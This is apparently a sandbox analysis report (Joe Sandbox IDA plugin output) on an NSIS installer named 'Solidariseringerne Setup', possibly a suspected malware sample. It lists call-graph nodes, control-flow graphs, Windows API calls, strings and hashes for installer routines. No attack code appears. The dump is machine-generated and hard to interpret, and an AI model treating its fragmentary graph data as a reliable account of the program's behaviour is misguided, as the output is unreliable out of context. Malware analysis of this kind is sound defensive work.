SendMessageA LoadCursorA SetCursor 4622->4629 4646 404012 KiUserCallbackDispatcher 4623->4646 4627 4041b2 CheckDlgButton 4624->4627 4628 40438f 4625->4628 4644 404012 KiUserCallbackDispatcher 4627->4644 4647 4043dd 4629->4647 4631 40436a SendMessageA 4630->4631 4632 40437b 4630->4632 4631->4632 4632->4628 4636 404381 SendMessageA 4632->4636 4633 4042c5 4637 4043b9 SendMessageA 4633->4637 4636->4628 4637->4615 4638 4041d0 GetDlgItem 4645 404025 SendMessageA 4638->4645 4641 4041e6 SendMessageA 4642 404204 GetSysColor 4641->4642 4643 40420d SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4641->4643 4642->4643 4643->4628 4644->4638 4645->4641 4646->4633 4650 405611 ShellExecuteExA 4647->4650 4649 404343 LoadCursorA SetCursor 4649->4621 4650->4649 4651 401b39 4652 402ac1 17 API calls 4651->4652 4653 401b40 4652->4653 4654 402a9f 17 API calls 4653->4654 4655 401b49 wsprintfA 4654->4655 4656 402951 4655->4656 4657 40233a 4658 402ac1 17 API calls 4657->4658 4659 40234b 4658->4659 4660 402ac1 17 API calls 4659->4660 4661 402354 4660->4661 4662 402ac1 17 API calls 4661->4662 4663 40235e GetPrivateProfileStringA 4662->4663 3512 4015bb 3513 402ac1 17 API calls 3512->3513 3514 4015c2 3513->3514 3515 405960 4 API calls 3514->3515 3527 4015ca 3515->3527 3516 401624 3518 401652 3516->3518 3519 401629 3516->3519 3517 4058f2 CharNextA 3517->3527 3521 401423 24 API calls 3518->3521 3539 401423 3519->3539 3529 40164a 3521->3529 3525 40163b SetCurrentDirectoryA 3525->3529 3527->3516 3527->3517 3528 40160c GetFileAttributesA 3527->3528 3531 4055b6 3527->3531 3534 40551c CreateDirectoryA 3527->3534 3543 405599 CreateDirectoryA 3527->3543 3528->3527 3546 4062c7 GetModuleHandleA 3531->3546 3535 405569 3534->3535 3536 40556d GetLastError 3534->3536 3535->3527 3536->3535 3537 40557c SetFileSecurityA 3536->3537 3537->3535 3538 405592 GetLastError 3537->3538 3538->3535 3540 405056 24 API calls 3539->3540 3541 401431 3540->3541 3542 405f2f lstrcpynA 3541->3542 3542->3525 3544 4055a9 3543->3544 3545 4055ad GetLastError 3543->3545 3544->3527 3545->3544 3547 4062e3 3546->3547 3548 4062ed GetProcAddress 3546->3548 3552 406259 GetSystemDirectoryA 3547->3552 3550 4055bd 3548->3550 3550->3527 3551 4062e9 3551->3548 3551->3550 3553 40627b wsprintfA LoadLibraryExA 3552->3553 3553->3551 3555 4031bb SetErrorMode GetVersion 3556 4031fc 3555->3556 3557 403202 3555->3557 3558 4062c7 5 API calls 3556->3558 3559 406259 3 API calls 3557->3559 3558->3557 3560 403218 lstrlenA 3559->3560 3560->3557 3561 403227 3560->3561 3562 4062c7 5 API calls 3561->3562 3563 40322e 3562->3563 3564 4062c7 5 API calls 3563->3564 3565 403235 3564->3565 3566 4062c7 5 API calls 3565->3566 3567 403241 #17 OleInitialize SHGetFileInfoA 3566->3567 3646 405f2f lstrcpynA 3567->3646 3570 40328d GetCommandLineA 3647 405f2f lstrcpynA 3570->3647 3572 40329f GetModuleHandleA 3573 4032b6 3572->3573 3574 4058f2 CharNextA 3573->3574 3575 4032ca CharNextA 3574->3575 3583 4032da 3575->3583 3576 4033a4 3577 4033b7 GetTempPathA 3576->3577 3648 40318a 3577->3648 3579 4033cf 3580 4033d3 GetWindowsDirectoryA lstrcatA 3579->3580 3581 403429 DeleteFileA 3579->3581 3584 40318a 12 API calls 3580->3584 3658 402d48 GetTickCount GetModuleFileNameA 3581->3658 3582 4058f2 CharNextA 3582->3583 3583->3576 3583->3582 3587 4033a6 3583->3587 3586 4033ef 3584->3586 3586->3581 3589 4033f3 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3586->3589 3742 405f2f lstrcpynA 3587->3742 3588 40343d 3596 4058f2 CharNextA 3588->3596 3629 4034c3 3588->3629 3641 4034d3 3588->3641 3592 40318a 12 API calls 3589->3592 3594 403421 3592->3594 3594->3581 3594->3641 3599 403458 3596->3599 3597 40360b 3601 403613 GetCurrentProcess OpenProcessToken 3597->3601 3602 40368d ExitProcess 3597->3602 3598 4034ed 3600 40564b MessageBoxIndirectA 3598->3600 3604 403503 3599->3604 3605 40349e 3599->3605 3606 4034fb ExitProcess 3600->3606 3607 40365e 3601->3607 3608 40362e LookupPrivilegeValueA AdjustTokenPrivileges 3601->3608 3610 4055b6 5 API calls 3604->3610 3609 4059b5 18 API calls 3605->3609 3611 4062c7 5 API calls 3607->3611 3608->3607 3613 4034a9 3609->3613 3612 403508 lstrcatA 3610->3612 3617 403665 3611->3617 3614 403524 lstrcatA lstrcmpiA 3612->3614 3615 403519 lstrcatA 3612->3615 3613->3641 3743 405f2f lstrcpynA 3613->3743 3620 403540 3614->3620 3614->3641 3615->3614 3616 40367a ExitWindowsEx 3616->3602 3618 403686 3616->3618 3617->3616 3617->3618 3754 40140b 3618->3754 3623 403545 3620->3623 3624 40354c 3620->3624 3622 4034b8 3744 405f2f lstrcpynA 3622->3744 3626 40551c 4 API calls 3623->3626 3627 405599 2 API calls 3624->3627 3630 40354a 3626->3630 3628 403551 SetCurrentDirectoryA 3627->3628 3631 403560 3628->3631 3632 40356b 3628->3632 3686 40377f 3629->3686 3630->3628 3752 405f2f lstrcpynA 3631->3752 3753 405f2f lstrcpynA 3632->3753 3635 405f51 17 API calls 3636 4035aa DeleteFileA 3635->3636 3637 4035b7 CopyFileA 3636->3637 3643 403579 3636->3643 3637->3643 3638 4035ff 3639 405d0e 36 API calls 3638->3639 3639->3641 3640 405d0e 36 API calls 3640->3643 3745 4036a5 3641->3745 3642 405f51 17 API calls 3642->3643 3643->3635 3643->3638 3643->3640 3643->3642 3644 4055ce 2 API calls 3643->3644 3645 4035eb CloseHandle 3643->3645 3644->3643 3645->3643 3646->3570 3647->3572 3649 406199 5 API calls 3648->3649 3651 403196 3649->3651 3650 4031a0 3650->3579 3651->3650 3652 4058c7 3 API calls 3651->3652 3653 4031a8 3652->3653 3654 405599 2 API calls 3653->3654 3655 4031ae 3654->3655 3656 405af7 2 API calls 3655->3656 3657 4031b9 3656->3657 3657->3579 3757 405ac8 GetFileAttributesA CreateFileA 3658->3757 3660 402d88 3681 402d98 3660->3681 3758 405f2f lstrcpynA 3660->3758 3662 402dae 3663 40590e 2 API calls 3662->3663 3664 402db4 3663->3664 3759 405f2f lstrcpynA 3664->3759 3666 402dbf GetFileSize 3667 402dd6 3666->3667 3668 402ebb 3666->3668 3667->3668 3671 40315d ReadFile 3667->3671 3673 402f27 3667->3673 3667->3681 3682 402ce4 6 API calls 3667->3682 3760 402ce4 3668->3760 3670 402ec4 3672 402ef4 GlobalAlloc 3670->3672 3670->3681 3772 403173 SetFilePointer 3670->3772 3671->3667 3771 403173 SetFilePointer 3672->3771 3677 402ce4 6 API calls 3673->3677 3676 402f0f 3680 402f81 35 API calls 3676->3680 3677->3681 3678 402edd 3679 40315d ReadFile 3678->3679 3683 402ee8 3679->3683 3684 402f1b 3680->3684 3681->3588 3682->3667 3683->3672 3683->3681 3684->3681 3685 402f58 SetFilePointer 3684->3685 3685->3681 3687 4062c7 5 API calls 3686->3687 3688 403793 3687->3688 3689 403799 3688->3689 3690 4037ab 3688->3690 3781 405e8d wsprintfA 3689->3781 3691 405e16 3 API calls 3690->3691 3692 4037d6 3691->3692 3693 4037f4 lstrcatA 3692->3693 3695 405e16 3 API calls 3692->3695 3696 4037a9 3693->3696 3695->3693 3773 403a44 3696->3773 3699 4059b5 18 API calls 3700 403826 3699->3700 3701 4038af 3700->3701 3703 405e16 3 API calls 3700->3703 3702 4059b5 18 API calls 3701->3702 3704 4038b5 3702->3704 3706 403852 3703->3706 3705 4038c5 LoadImageA 3704->3705 3707 405f51 17 API calls 3704->3707 3708 40396b 3705->3708 3709 4038ec RegisterClassA 3705->3709 3706->3701 3710 40386e lstrlenA 3706->3710 3714 4058f2 CharNextA 3706->3714 3707->3705 3713 40140b 2 API calls 3708->3713 3711 403922 SystemParametersInfoA CreateWindowExA 3709->3711 3712 403975 3709->3712 3715 4038a2 3710->3715 3716 40387c lstrcmpiA 3710->3716 3711->3708 3712->3641 3717 403971 3713->3717 3718 40386c 3714->3718 3720 4058c7 3 API calls 3715->3720 3716->3715 3719 40388c GetFileAttributesA 3716->3719 3717->3712 3722 403a44 18 API calls 3717->3722 3718->3710 3721 403898 3719->3721 3723 4038a8 3720->3723 3721->3715 3724 40590e 2 API calls 3721->3724 3725 403982 3722->3725 3782 405f2f lstrcpynA 3723->3782 3724->3715 3727 403a11 3725->3727 3728 40398e ShowWindow 3725->3728 3729 405128 5 API calls 3727->3729 3730 406259 3 API calls 3728->3730 3731 403a17 3729->3731 3732 4039a6 3730->3732 3733 403a33 3731->3733 3734 403a1b 3731->3734 3735 4039b4 GetClassInfoA 3732->3735 3737 406259 3 API calls 3732->3737 3736 40140b 2 API calls 3733->3736 3734->3712 3741 40140b 2 API calls 3734->3741 3738 4039c8 GetClassInfoA RegisterClassA 3735->3738 3739 4039de DialogBoxParamA 3735->3739 3736->3712 3737->3735 3738->3739 3740 40140b 2 API calls 3739->3740 3740->3712 3741->3712 3742->3577 3743->3622 3744->3629 3746 4036bd 3745->3746 3747 4036af CloseHandle 3745->3747 3787 4036ea 3746->3787 3747->3746 3750 4056f7 67 API calls 3751 4034dc OleUninitialize 3750->3751 3751->3597 3751->3598 3752->3632 3753->3643 3755 401389 2 API calls 3754->3755 3756 401420 3755->3756 3756->3602 3757->3660 3758->3662 3759->3666 3761 402d05 3760->3761 3762 402ced 3760->3762 3763 402d15 GetTickCount 3761->3763 3764 402d0d 3761->3764 3765 402cf6 DestroyWindow 3762->3765 3766 402cfd 3762->3766 3768 402d23 CreateDialogParamA ShowWindow 3763->3768 3769 402d46 3763->3769 3767 406303 2 API calls 3764->3767 3765->3766 3766->3670 3770 402d13 3767->3770 3768->3769 3769->3670 3770->3670 3771->3676 3772->3678 3774 403a58 3773->3774 3783 405e8d wsprintfA 3774->3783 3776 403ac9 3784 403afd 3776->3784 3778 403804 3778->3699 3779 403ace 3779->3778 3780 405f51 17 API calls 3779->3780 3780->3779 3781->3696 3782->3701 3783->3776 3785 405f51 17 API calls 3784->3785 3786 403b0b SetWindowTextA 3785->3786 3786->3779 3788 4036f8 3787->3788 3789 4036fd FreeLibrary GlobalFree 3788->3789 3790 4036c2 3788->3790 3789->3789 3789->3790 3790->3750 4664 401d3b GetDlgItem GetClientRect 4665 402ac1 17 API calls 4664->4665 4666 401d6b LoadImageA SendMessageA 4665->4666 4667 401d89 DeleteObject 4666->4667 4668 402951 4666->4668 4667->4668 4669 4016bb 4670 402ac1 17 API calls 4669->4670 4671 4016c1 GetFullPathNameA 4670->4671 4672 4016d8 4671->4672 4673 4016f9 4671->4673 4672->4673 4676 406232 2 API calls 4672->4676 4674 402951 4673->4674 4675 40170d GetShortPathNameA 4673->4675 4675->4674 4677 4016e9 4676->4677 4677->4673 4679 405f2f lstrcpynA 4677->4679 4679->4673 4680 4065bb 4684 40643f 4680->4684 4681 406daa 4682 4064c0 GlobalFree 4683 4064c9 GlobalAlloc 4682->4683 4683->4681 4683->4684 4684->4681 4684->4682 4684->4683 4685 406540 GlobalAlloc 4684->4685 4686 406537 GlobalFree 4684->4686 4685->4681 4685->4684 4686->4685 4687 40373d 4688 403748 4687->4688 4689 40374f GlobalAlloc 4688->4689 4690 40374c 4688->4690 4689->4690

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 4031bb-4031fa SetErrorMode GetVersion 1 4031fc-403204 call 4062c7 0->1 2 40320d 0->2 1->2 7 403206 1->7 3 403212-403225 call 406259 lstrlenA 2->3 9 403227-403243 call 4062c7 * 3 3->9 7->2 16 403254-4032b4 #17 OleInitialize SHGetFileInfoA call 405f2f GetCommandLineA call 405f2f GetModuleHandleA 9->16 17 403245-40324b 9->17 24 4032c0-4032d5 call 4058f2 CharNextA 16->24 25 4032b6-4032bb 16->25 17->16 21 40324d 17->21 21->16 28 40339a-40339e 24->28 25->24 29 4033a4 28->29 30 4032da-4032dd 28->30 33 4033b7-4033d1 GetTempPathA call 40318a 29->33 31 4032e5-4032ed 30->31 32 4032df-4032e3 30->32 35 4032f5-4032f8 31->35 36 4032ef-4032f0 31->36 32->31 32->32 42 4033d3-4033f1 GetWindowsDirectoryA lstrcatA call 40318a 33->42 43 403429-403443 DeleteFileA call 402d48 33->43 38 40338a-403397 call 4058f2 35->38 39 4032fe-403302 35->39 36->35 38->28 57 403399 38->57 40 403304-40330a 39->40 41 40331a-403347 39->41 45 403310 40->45 46 40330c-40330e 40->46 47 403349-40334f 41->47 48 40335a-403388 41->48 42->43 58 4033f3-403423 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 40318a 42->58 59 4034d7-4034e7 call 4036a5 OleUninitialize 43->59 60 403449-40344f 43->60 45->41 46->41 46->45 52 403351-403353 47->52 53 403355 47->53 48->38 55 4033a6-4033b2 call 405f2f 48->55 52->48 52->53 53->48 55->33 57->28 58->43 58->59 70 40360b-403611 59->70 71 4034ed-4034fd call 40564b ExitProcess 59->71 64 403451-40345c call 4058f2 60->64 65 4034c7-4034ce call 40377f 60->65 74 403492-40349c 64->74 75 40345e-403487 64->75 72 4034d3 65->72 77 403613-40362c GetCurrentProcess OpenProcessToken 70->77 78 40368d-403695 70->78 72->59 82 403503-403517 call 4055b6 lstrcatA 74->82 83 40349e-4034ab call 4059b5 74->83 79 403489-40348b 75->79 85 40365e-40366c call 4062c7 77->85 86 40362e-403658 LookupPrivilegeValueA AdjustTokenPrivileges 77->86 80 403697 78->80 81 40369b-40369f ExitProcess 78->81 79->74 87 40348d-403490 79->87 80->81 95 403524-40353e lstrcatA lstrcmpiA 82->95 96 403519-40351f lstrcatA 82->96 83->59 94 4034ad-4034c3 call 405f2f * 2 83->94 97 40367a-403684 ExitWindowsEx 85->97 98 40366e-403678 85->98 86->85 87->74 87->79 94->65 95->59 101 403540-403543 95->101 96->95 97->78 99 403686-403688 call 40140b 97->99 98->97 98->99 99->78 104 403545-40354a call 40551c 101->104 105 40354c call 405599 101->105 110 403551-40355e SetCurrentDirectoryA 104->110 105->110 113 403560-403566 call 405f2f 110->113 114 40356b-403593 call 405f2f 110->114 113->114 118 403599-4035b5 call 405f51 DeleteFileA 114->118 121 4035f6-4035fd 118->121 122 4035b7-4035c7 CopyFileA 118->122 121->118 123 4035ff-403606 call 405d0e 121->123 122->121 124 4035c9-4035e9 call 405d0e call 405f51 call 4055ce 122->124 123->59 124->121 133 4035eb-4035f2 CloseHandle 124->133 133->121
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE ref: 004031E0
                                                                              • GetVersion.KERNEL32 ref: 004031E6
                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403219
                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403255
                                                                              • OleInitialize.OLE32(00000000), ref: 0040325C
                                                                              • SHGetFileInfoA.SHELL32(0041ECC8,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403278
                                                                              • GetCommandLineA.KERNEL32(00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 0040328D
                                                                              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\AwMu7gR48D.exe",00000000,?,00000006,00000008,0000000A), ref: 004032A0
                                                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\AwMu7gR48D.exe",00000020,?,00000006,00000008,0000000A), ref: 004032CB
                                                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033C8
                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004033D9
                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004033E5
                                                                              • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004033F9
                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403401
                                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403412
                                                                              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040341A
                                                                              • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040342E
                                                                                • Part of subcall function 004062C7: GetModuleHandleA.KERNEL32(?,?,?,0040322E,0000000A), ref: 004062D9
                                                                                • Part of subcall function 004062C7: GetProcAddress.KERNEL32(00000000,?), ref: 004062F4
                                                                                • Part of subcall function 00405F2F: lstrcpynA.KERNEL32(?,?,00000400,0040328D,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F3C
                                                                                • Part of subcall function 0040377F: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\unshabbily,1033,Solidariseringerne Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Solidariseringerne Setup: Completed,00000000,00000002,76F93410), ref: 0040386F
                                                                                • Part of subcall function 0040377F: lstrcmpiA.KERNEL32(?,.exe), ref: 00403882
                                                                                • Part of subcall function 0040377F: GetFileAttributesA.KERNEL32(: Completed), ref: 0040388D
                                                                                • Part of subcall function 0040377F: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\unshabbily), ref: 004038D6
                                                                                • Part of subcall function 0040377F: RegisterClassA.USER32(00422EA0), ref: 00403913
                                                                                • Part of subcall function 004036A5: CloseHandle.KERNEL32(000002B8,004034DC,?,?,00000006,00000008,0000000A), ref: 004036B0
                                                                              • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 004034DC
                                                                              • ExitProcess.KERNEL32 ref: 004034FD
                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 0040361A
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403621
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403639
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403658
                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 0040367C
                                                                              • ExitProcess.KERNEL32 ref: 0040369F
                                                                                • Part of subcall function 0040564B: MessageBoxIndirectA.USER32(00409218), ref: 004056A6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ExitFileHandle$EnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpilstrcpyn
                                                                              • String ID: "$"C:\Users\user\Desktop\AwMu7gR48D.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\unshabbily$C:\Users\user\AppData\Local\unshabbily\Hardwire$C:\Users\user\Desktop$C:\Users\user\Desktop\AwMu7gR48D.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                              • API String ID: 3855923921-2475149311
                                                                              • Opcode ID: 41a2d84af2d5407adc1c32c5249e47afef491bae6f079a6a4bd1fd594076673a
                                                                              • Instruction ID: af4360d81dc256b8c9424dc56f1358f7fe08c6a718ebf40f6c8df5272bc15683
                                                                              • Opcode Fuzzy Hash: 41a2d84af2d5407adc1c32c5249e47afef491bae6f079a6a4bd1fd594076673a
                                                                              • Instruction Fuzzy Hash: 14C1F5706086427AE7217F719D49B2B3EACEB85306F04457FF541B62E2C77C9A058B2E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 134 405194-4051b0 135 4051b6-40527d GetDlgItem * 3 call 404025 call 4048f4 GetClientRect GetSystemMetrics SendMessageA * 2 134->135 136 40533f-405345 134->136 156 40529b-40529e 135->156 157 40527f-405299 SendMessageA * 2 135->157 138 405347-405369 GetDlgItem CreateThread CloseHandle 136->138 139 40536f-40537b 136->139 138->139 141 40539d-4053a3 139->141 142 40537d-405383 139->142 146 4053a5-4053ab 141->146 147 4053f8-4053fb 141->147 144 405385-405398 ShowWindow * 2 call 404025 142->144 145 4053be-4053c5 call 404057 142->145 144->141 160 4053ca-4053ce 145->160 151 4053d1-4053e1 ShowWindow 146->151 152 4053ad-4053b9 call 403fc9 146->152 147->145 149 4053fd-405403 147->149 149->145 158 405405-405418 SendMessageA 149->158 154 4053f1-4053f3 call 403fc9 151->154 155 4053e3-4053ec call 405056 151->155 152->145 154->147 155->154 163 4052a0-4052ac SendMessageA 156->163 164 4052ae-4052c5 call 403ff0 156->164 157->156 165 405515-405517 158->165 166 40541e-40544a CreatePopupMenu call 405f51 AppendMenuA 158->166 163->164 173 4052c7-4052db ShowWindow 164->173 174 4052fb-40531c GetDlgItem SendMessageA 164->174 165->160 171 40544c-40545c GetWindowRect 166->171 172 40545f-405475 TrackPopupMenu 166->172 171->172 172->165 176 40547b-405495 172->176 177 4052ea 173->177 178 4052dd-4052e8 ShowWindow 173->178 174->165 175 405322-40533a SendMessageA * 2 174->175 175->165 179 40549a-4054b5 SendMessageA 176->179 180 4052f0-4052f6 call 404025 177->180 178->180 179->179 181 4054b7-4054d7 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 4054d9-4054f9 SendMessageA 181->183 183->183 184 4054fb-40550f GlobalUnlock SetClipboardData CloseClipboard 183->184 184->165
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000403), ref: 004051F3
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405202
                                                                              • GetClientRect.USER32(?,?), ref: 0040523F
                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405246
                                                                              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405267
                                                                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405278
                                                                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040528B
                                                                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405299
                                                                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052AC
                                                                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004052CE
                                                                              • ShowWindow.USER32(?,00000008), ref: 004052E2
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405303
                                                                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405313
                                                                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040532C
                                                                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405338
                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405211
                                                                                • Part of subcall function 00404025: SendMessageA.USER32(00000028,?,00000001,00403E55), ref: 00404033
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405354
                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005128,00000000), ref: 00405362
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00405369
                                                                              • ShowWindow.USER32(00000000), ref: 0040538C
                                                                              • ShowWindow.USER32(?,00000008), ref: 00405393
                                                                              • ShowWindow.USER32(00000008), ref: 004053D9
                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040540D
                                                                              • CreatePopupMenu.USER32 ref: 0040541E
                                                                              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405433
                                                                              • GetWindowRect.USER32(?,000000FF), ref: 00405453
                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040546C
                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054A8
                                                                              • OpenClipboard.USER32(00000000), ref: 004054B8
                                                                              • EmptyClipboard.USER32 ref: 004054BE
                                                                              • GlobalAlloc.KERNEL32(00000042,?), ref: 004054C7
                                                                              • GlobalLock.KERNEL32(00000000), ref: 004054D1
                                                                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054E5
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004054FE
                                                                              • SetClipboardData.USER32(00000001,00000000), ref: 00405509
                                                                              • CloseClipboard.USER32 ref: 0040550F
                                                                              Strings
                                                                              • Solidariseringerne Setup: Completed, xrefs: 00405484
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                              • String ID: Solidariseringerne Setup: Completed
                                                                              • API String ID: 590372296-345998224
                                                                              • Opcode ID: 7ce4c4186a3c3c97c38a9d5959e83e30d411a0e44afbdab31a022d6e1ea2659f
                                                                              • Instruction ID: ffe0cad38c51bf677d90d52cc1be9089f0253f1d9aa70b106fb857e880bd7d9d
                                                                              • Opcode Fuzzy Hash: 7ce4c4186a3c3c97c38a9d5959e83e30d411a0e44afbdab31a022d6e1ea2659f
                                                                              • Instruction Fuzzy Hash: B5A15AB1900208BFDB119FA4DD89AAE7F79FB08355F00403AFA05B62A0C7B55E51DF69

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 493 4056f7-40571d call 4059b5 496 405736-40573d 493->496 497 40571f-405731 DeleteFileA 493->497 499 405750-405760 call 405f2f 496->499 500 40573f-405741 496->500 498 4058c0-4058c4 497->498 508 405762-40576d lstrcatA 499->508 509 40576f-405770 call 40590e 499->509 501 405747-40574a 500->501 502 40586e-405873 500->502 501->499 501->502 502->498 504 405875-405878 502->504 506 405882-40588a call 406232 504->506 507 40587a-405880 504->507 506->498 517 40588c-4058a0 call 4058c7 call 4056af 506->517 507->498 510 405775-405778 508->510 509->510 513 405783-405789 lstrcatA 510->513 514 40577a-405781 510->514 516 40578e-4057ac lstrlenA FindFirstFileA 513->516 514->513 514->516 518 4057b2-4057c9 call 4058f2 516->518 519 405864-405868 516->519 529 4058a2-4058a5 517->529 530 4058b8-4058bb call 405056 517->530 527 4057d4-4057d7 518->527 528 4057cb-4057cf 518->528 519->502 521 40586a 519->521 521->502 532 4057d9-4057de 527->532 533 4057ea-4057f8 call 405f2f 527->533 528->527 531 4057d1 528->531 529->507 535 4058a7-4058b6 call 405056 call 405d0e 529->535 530->498 531->527 537 4057e0-4057e2 532->537 538 405843-405855 FindNextFileA 532->538 543 4057fa-405802 533->543 544 40580f-40581a call 4056af 533->544 535->498 537->533 542 4057e4-4057e8 537->542 538->518 541 40585b-40585e FindClose 538->541 541->519 542->533 542->538 543->538 546 405804-40580d call 4056f7 543->546 553 40583b-40583e call 405056 544->553 554 40581c-40581f 544->554 546->538 553->538 556 405821-405831 call 405056 call 405d0e 554->556 557 405833-405839 554->557 556->538 557->538
                                                                              APIs
                                                                              • DeleteFileA.KERNELBASE(?,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405720
